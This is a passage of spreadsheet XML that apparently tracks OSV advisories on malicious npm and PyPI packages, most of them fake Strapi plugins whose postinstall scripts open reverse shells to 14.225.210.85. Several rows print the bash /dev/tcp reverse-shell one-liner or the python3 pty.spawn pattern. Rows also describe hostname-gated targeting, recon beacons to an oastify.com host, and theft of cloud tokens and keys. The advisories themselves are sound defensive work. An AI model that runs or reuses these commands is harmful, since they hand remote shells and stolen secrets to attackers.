The package declares a postinstall lifecycle hook ("postinstall": "node postinstall.js") that executes on every `npm install`. postinstall.js invokes child_process.exec with a bash reverse-shell command connecting the installer's host to the hardcoded remote endpoint 14.225.210.85:80 via /dev/tcp, redirecting stdio to give the remote party an interactive shell on the installer's machine. Execution is gated by a hostname allowlist (matching 'ubuntu-fc-uvm'), and a retry loop plus a log file at /tmp/postinstall-revshell.log indicate a persistent, targeted deployment. The plugin name mimics the Strapi plugin namespace but ships no plugin functionality relevant to that framing.
</t>
        </is>
      </c>
      <c r="S58" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16229</t>
        </is>
      </c>
    </row>
    <row r="59">
      <c r="A59" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B59" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C59" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16230</t>
        </is>
      </c>
      <c r="D59" s="5" t="inlineStr"/>
      <c r="E59" s="5" t="inlineStr"/>
      <c r="F59" s="5" t="inlineStr"/>
      <c r="G59" s="5" t="inlineStr"/>
      <c r="H59" s="5" t="inlineStr"/>
      <c r="I59" s="5" t="inlineStr"/>
      <c r="J59" s="5" t="inlineStr"/>
      <c r="K59" s="5" t="inlineStr"/>
      <c r="L59" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-feedmeeb</t>
        </is>
      </c>
      <c r="M59" s="5" t="inlineStr"/>
      <c r="N59" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O59" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P59" s="5" t="inlineStr"/>
      <c r="Q59" s="5" t="inlineStr"/>
      <c r="R59" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7ecf1e41fb24d24ffe7b55319dda947ae30bfabb9266e38c17e1231cf4492ec5)
strapi-plugin-feedmeeb@3.6.8 ships a package.json postinstall hook that executes postinstall.js on npm install. The script constructs a bash reverse shell of the form `bash -i &gt;&amp; /dev/tcp/14.225.210.85/80 0&gt;&amp;1` and exec's it via child_process, with retry logic, giving the operator of 14.225.210.85 interactive command execution on the installer's host. Alongside the shell, the script collects os.hostname() and os.userInfo().username to identify the compromised machine. The package presents itself as a Strapi plugin but its install-time behavior is unrelated to any plugin function.
</t>
        </is>
      </c>
      <c r="S59" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16230</t>
        </is>
      </c>
    </row>
    <row r="60">
      <c r="A60" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B60" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C60" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16231</t>
        </is>
      </c>
      <c r="D60" s="5" t="inlineStr"/>
      <c r="E60" s="5" t="inlineStr"/>
      <c r="F60" s="5" t="inlineStr"/>
      <c r="G60" s="5" t="inlineStr"/>
      <c r="H60" s="5" t="inlineStr"/>
      <c r="I60" s="5" t="inlineStr"/>
      <c r="J60" s="5" t="inlineStr"/>
      <c r="K60" s="5" t="inlineStr"/>
      <c r="L60" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-honey-meeb</t>
        </is>
      </c>
      <c r="M60" s="5" t="inlineStr"/>
      <c r="N60" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O60" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P60" s="5" t="inlineStr"/>
      <c r="Q60" s="5" t="inlineStr"/>
      <c r="R60" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (752c0a1146068824e355a38b25add15f092d7cea6f846c143b5b2d2210de6766)
The package's postinstall lifecycle script (postinstall.js) spawns a Python-based reverse shell that opens a TCP socket to the hardcoded IP 14.225.210.85:80, dup2's stdin/stdout/stderr onto the socket, and calls pty.spawn('sh'), yielding an interactive remote shell on the installer's host at npm install time. Execution is gated by an os.hostname() check against 'ubuntu-fc-uvm', with self-labeled log strings such as '[+] Starting reverse shell' and '[+] proceeding with exploit' — a targeting/evasion pattern indicative of an intentional attack rather than a demo. The package name resembles the legitimate Strapi plugin ecosystem, but the shipped install-time payload has no legitimate purpose.
</t>
        </is>
      </c>
      <c r="S60" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16231</t>
        </is>
      </c>
    </row>
    <row r="61">
      <c r="A61" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B61" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C61" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16232</t>
        </is>
      </c>
      <c r="D61" s="5" t="inlineStr"/>
      <c r="E61" s="5" t="inlineStr"/>
      <c r="F61" s="5" t="inlineStr"/>
      <c r="G61" s="5" t="inlineStr"/>
      <c r="H61" s="5" t="inlineStr"/>
      <c r="I61" s="5" t="inlineStr"/>
      <c r="J61" s="5" t="inlineStr"/>
      <c r="K61" s="5" t="inlineStr"/>
      <c r="L61" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-listcc-meeb</t>
        </is>
      </c>
      <c r="M61" s="5" t="inlineStr"/>
      <c r="N61" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O61" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P61" s="5" t="inlineStr"/>
      <c r="Q61" s="5" t="inlineStr"/>
      <c r="R61" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (63bef6a3804e282781fb0eaea1ffd045ef3b236aefd0668de11549aba1ada8b0)
strapi-plugin-listcc-meeb@3.6.8 declares scripts.postinstall = 'node postinstall.js' (and points main at the same file), so `npm install` auto-executes postinstall.js. That script spawns a Python one-liner via child_process that opens a socket to the hardcoded IP 14.225.210.85:80 and attaches a PTY-backed /bin/sh to the remote peer, yielding an interactive reverse shell on the installer's host. Execution is gated only by a hostname check ('ubuntu-fc-uvm'). Package metadata masquerades as a Strapi plugin ('Strapi plugin for enhanced functionality') while the repository/homepage is a placeholder github.com/user/... URL and the shipped code contains no plugin functionality — only the reverse-shell payload.
</t>
        </is>
      </c>
      <c r="S61" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16232</t>
        </is>
      </c>
    </row>
    <row r="62">
      <c r="A62" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B62" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C62" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16233</t>
        </is>
      </c>
      <c r="D62" s="5" t="inlineStr"/>
      <c r="E62" s="5" t="inlineStr"/>
      <c r="F62" s="5" t="inlineStr"/>
      <c r="G62" s="5" t="inlineStr"/>
      <c r="H62" s="5" t="inlineStr"/>
      <c r="I62" s="5" t="inlineStr"/>
      <c r="J62" s="5" t="inlineStr"/>
      <c r="K62" s="5" t="inlineStr"/>
      <c r="L62" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-maylog-meeb</t>
        </is>
      </c>
      <c r="M62" s="5" t="inlineStr"/>
      <c r="N62" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O62" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P62" s="5" t="inlineStr"/>
      <c r="Q62" s="5" t="inlineStr"/>
      <c r="R62" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8d714c1585f058d5ac528832398ffe2d0035fd8b60e97e461cdfa8e1533e851c)
The package's postinstall.js lifecycle script executes automatically on `npm install` and spawns a python3 reverse shell that connects to the hardcoded remote endpoint 14.225.210.85:80 and attaches an interactive `sh` PTY to the socket, giving the operator of that endpoint full shell access to the installer's host. Prior to the connect, the script collects host identifiers (os.hostname(), os.userInfo().username, process.pid) and writes them to /tmp/postinstall-revshell.log; those identifiers are also exposed to the remote endpoint once the shell attaches. The script retries on failure. The package name and description masquerade as a Strapi audit-log plugin; no functionality in the tarball corresponds to that stated purpose.
</t>
        </is>
      </c>
      <c r="S62" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16233</t>
        </is>
      </c>
    </row>
    <row r="63">
      <c r="A63" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B63" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C63" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16234</t>
        </is>
      </c>
      <c r="D63" s="5" t="inlineStr"/>
      <c r="E63" s="5" t="inlineStr"/>
      <c r="F63" s="5" t="inlineStr"/>
      <c r="G63" s="5" t="inlineStr"/>
      <c r="H63" s="5" t="inlineStr"/>
      <c r="I63" s="5" t="inlineStr"/>
      <c r="J63" s="5" t="inlineStr"/>
      <c r="K63" s="5" t="inlineStr"/>
      <c r="L63" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-os-rec</t>
        </is>
      </c>
      <c r="M63" s="5" t="inlineStr"/>
      <c r="N63" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O63" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P63" s="5" t="inlineStr"/>
      <c r="Q63" s="5" t="inlineStr"/>
      <c r="R63" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6b7f08345375bd52a25c34cc61a3e877c1a9f8f364a90a76b3a1eff55216ea03)
postinstall.js runs automatically on npm install and collects host reconnaissance data — os.hostname(), os.platform(), os.arch(), os.type(), os.release(), the current username, and enumeration of all network interface addresses — then transmits them as query-string parameters in an HTTP GET to hardcoded host 8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com on port 80 at path /osinfo. The oastify.com subdomain is a Burp Collaborator out-of-band interaction endpoint used to receive reconnaissance beacons. The behavior is undocumented, fires on default install with no user interaction, and identifies the installing machine to an attacker-controlled listener.
</t>
        </is>
      </c>
      <c r="S63" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16234</t>
        </is>
      </c>
    </row>
    <row r="64">
      <c r="A64" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B64" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C64" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16235</t>
        </is>
      </c>
      <c r="D64" s="5" t="inlineStr"/>
      <c r="E64" s="5" t="inlineStr"/>
      <c r="F64" s="5" t="inlineStr"/>
      <c r="G64" s="5" t="inlineStr"/>
      <c r="H64" s="5" t="inlineStr"/>
      <c r="I64" s="5" t="inlineStr"/>
      <c r="J64" s="5" t="inlineStr"/>
      <c r="K64" s="5" t="inlineStr"/>
      <c r="L64" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-osag</t>
        </is>
      </c>
      <c r="M64" s="5" t="inlineStr"/>
      <c r="N64" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O64" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P64" s="5" t="inlineStr"/>
      <c r="Q64" s="5" t="inlineStr"/>
      <c r="R64" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (34d9349a970008e54774fc533af589248d578e1d34f6f82a9a6630beeabd2203)
The package presents itself as a Strapi plugin but ships no plugin code — only a postinstall.js script that runs automatically on `npm install`. The script collects installer-side host identifiers (hostname, OS platform/arch/type/release, username, home directory) and enumerates all network interface addresses, then transmits them as query parameters in a plain HTTP GET to a hardcoded Burp Collaborator subdomain 8y70jt07jkewju8wh0o1cgkaw12sqje8.oastify.com on port 80. The package's declared repository/homepage points at a placeholder github.com/user/strapi-plugin-yayccresh-meeb URL that does not identify a real publisher, and the Strapi-branded name does not match the shipped contents.
</t>
        </is>
      </c>
      <c r="S64" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16235</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16236</t>
        </is>
      </c>
      <c r="D65" s="5" t="inlineStr"/>
      <c r="E65" s="5" t="inlineStr"/>
      <c r="F65" s="5" t="inlineStr"/>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-perev-meeb</t>
        </is>
      </c>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr"/>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (29840a9eddc4894177d910b38ef1808c0ba7a402c267160fe8e86cff48873700)
The npm postinstall hook executes postinstall.js, which uses child_process to spawn a Python reverse shell that connects to the hardcoded remote host 14.225.210.85:80 and dup2's a PTY-backed /bin/sh over the socket, giving the operator of that host an interactive shell on the installer's machine. Execution is gated by a hostname allowlist check (os.hostname() === 'ubuntu-fc-uvm'), a target-restriction technique that keeps the payload dormant on unintended hosts (scanners, sandboxes) and only detonates on the intended victim. The package presents itself as a Strapi plugin but ships no plugin functionality relevant to the postinstall behavior; the postinstall is the payload.
</t>
        </is>
      </c>
      <c r="S65" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16236</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16237</t>
        </is>
      </c>
      <c r="D66" s="5" t="inlineStr"/>
      <c r="E66" s="5" t="inlineStr"/>
      <c r="F66" s="5" t="inlineStr"/>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-persh-meeb</t>
        </is>
      </c>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr"/>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (67ce68eeb9a309b5fff512e24a1b8f4c12fb171c0752d6a04293a4e72c805088)
strapi-plugin-persh-meeb@3.6.8 ships a postinstall.js (also declared as the package `main`) that runs automatically on `npm install`. The script spawns a Python one-liner that opens a TCP socket to the hardcoded bare IP 14.225.210.85 on port 443 (with:80 also referenced), duplicates the socket over stdio, and calls `pty.spawn("sh")`, giving the remote host an interactive shell on the installer's machine. Retries up to 5 times at 10-second intervals. Execution is gated by a hostname allowlist check (`os.hostname() === 'ubuntu-fc-uvm'`) and logs to `/tmp/postinstall-revshell.log`, consistent with a targeted red-team or victim-tuned implant. The destination is a bare IP unrelated to any Strapi or plugin-publisher infrastructure, and the package name resembles the Strapi plugin ecosystem.
</t>
        </is>
      </c>
      <c r="S66" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16237</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16238</t>
        </is>
      </c>
      <c r="D67" s="5" t="inlineStr"/>
      <c r="E67" s="5" t="inlineStr"/>
      <c r="F67" s="5" t="inlineStr"/>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-portcc-meeb</t>
        </is>
      </c>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr"/>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (5f04ef6b35ce447e6825a520a88eda4fe27ebfe6214648906db673e7d57ea86b)
Package advertises itself as a Strapi plugin but ships no plugin functionality; the entire payload is postinstall.js, which is also declared as the package `main`. On install, postinstall.js checks os.hostname() against 'ubuntu-fc-uvm' and then invokes child_process.exec on an inline python3 one-liner that opens a TCP socket to the hardcoded remote host 14.225.210.85:80, dups the socket onto stdin/stdout/stderr, and calls pty.spawn('sh'), yielding an interactive reverse shell on the installer's machine. A retry loop attempts up to five reconnects. The hostname gate is a targeting/anti-analysis check, not a safety limit. The package name and Strapi-plugin framing are a cover story; no legitimate plugin code is present.
</t>
        </is>
      </c>
      <c r="S67" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16238</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16239</t>
        </is>
      </c>
      <c r="D68" s="5" t="inlineStr"/>
      <c r="E68" s="5" t="inlineStr"/>
      <c r="F68" s="5" t="inlineStr"/>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-pysh-meeb</t>
        </is>
      </c>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr"/>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (188e8ecd93a0124135c178af848914dbd0f8cc7c3f9fdc7f5137fc94e46bb27d)
strapi-plugin-pysh-meeb@3.6.8 ships a postinstall.js (also declared as the package main) that runs automatically on npm install. The script uses child_process to spawn a Python one-liner (`python3 -c 'import sys,socket,os,pty;...pty.spawn("sh")'`) which opens an outbound TCP connection to the hardcoded attacker IP 14.225.210.85:80 and hands an interactive PTY shell to the remote endpoint, giving full remote code execution on the installer's host. Detonation is gated by an os.hostname() equality check against 'ubuntu-fc-uvm', a targeting/evasion mechanism that suppresses the payload on other hosts while firing on the intended victim; retry logic is present to re-establish the connection. Package metadata is consistent with a typosquat dropper: the name mimics a Strapi plugin, the repository URL uses a placeholder 'user' org and a mismatched slug (strapi-plugin-yayccresh-meeb), and the description is a generic 'Strapi plugin for enhanced functionality'. No legitimate plugin functionality is shipped.
</t>
        </is>
      </c>
      <c r="S68" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16239</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16240</t>
        </is>
      </c>
      <c r="D69" s="5" t="inlineStr"/>
      <c r="E69" s="5" t="inlineStr"/>
      <c r="F69" s="5" t="inlineStr"/>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr">
        <is>
          <t>PyPI:praetorian-mind-rce-test-2026</t>
        </is>
      </c>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr"/>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (f9a677a1b1a8762a3f01e91a8da196298bf146b255dc7f9d834842916882372b)
During installation, package exfiltrates environment variables, tokens from cloud environments and fingerprints the environment. It identifies itself as a security testing engagement.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-praetorian-mind-rce-test-2026
Reasons (based on the campaign):
 - exfiltration-env-variables
 - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
 - exfiltration-cloud-tokens
## Source: ossf-package-analysis (48d3d63e8f3773e745ea3c4961c8d598e880db130cf063cc738a381080c2b782)
The OpenSSF Package Analysis project identified 'praetorian-mind-rce-test-2026' @ 0.0.2 (pypi) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
</t>
        </is>
      </c>
      <c r="S69" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16240</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16241</t>
        </is>
      </c>
      <c r="D70" s="5" t="inlineStr"/>
      <c r="E70" s="5" t="inlineStr"/>
      <c r="F70" s="5" t="inlineStr"/>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr">
        <is>
          <t>PyPI:rak-lab-yoav-orca-zrktd2cp5hjmo4x7</t>
        </is>
      </c>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr"/>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (ee8eb9dfebb1388345acb8b7185f69adcf072f02ea058bc3d64a81e91733b5d0)
Package appears to be internal test of dependency confusion.
---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research &amp; co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
 - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="S70" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16241</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16242</t>
        </is>
      </c>
      <c r="D71" s="5" t="inlineStr"/>
      <c r="E71" s="5" t="inlineStr"/>
      <c r="F71" s="5" t="inlineStr"/>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr">
        <is>
          <t>PyPI:trongappy</t>
        </is>
      </c>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr"/>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (91ef2777a3657922888663423a9cadfbad9e4366473b5c7c4e03a7608e49fa36)
Package appears to be designed for private key exfiltration, but no known usage. The name appears to be related to the cryptocurrency TRX (Tron / Tronix). Some packages additionally clone the readme of other, legit libraries. The similar packages are repeating uploaded to PyPI
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2025-04-tronix
Reasons (based on the campaign):
 - exfiltration-generic
 - crypto-related
</t>
        </is>
      </c>
      <c r="S71" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16242</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16243</t>
        </is>
      </c>
      <c r="D72" s="5" t="inlineStr"/>
      <c r="E72" s="5" t="inlineStr"/>
      <c r="F72" s="5" t="inlineStr"/>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr">
        <is>
          <t>npm:idx_form_script</t>
        </is>
      </c>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr"/>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ossf-package-analysis (59d074c4d6bd941d9586764043d556a83d301711c58eb661d57d63fa06ebec60)
The OpenSSF Package Analysis project identified 'idx_form_script' @ 999.0.4 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
</t>
        </is>
      </c>
      <c r="S72" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16243</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S72"/>
  <conditionalFormatting sqref="E2:E72">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72">
    <cfRule type="cellIs" priority="5" operator="equal" dxfId="4">
      <formula>"Yes"</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2" r:id="rId1"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S3" r:id="rId2"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S4" r:id="rId3"/>
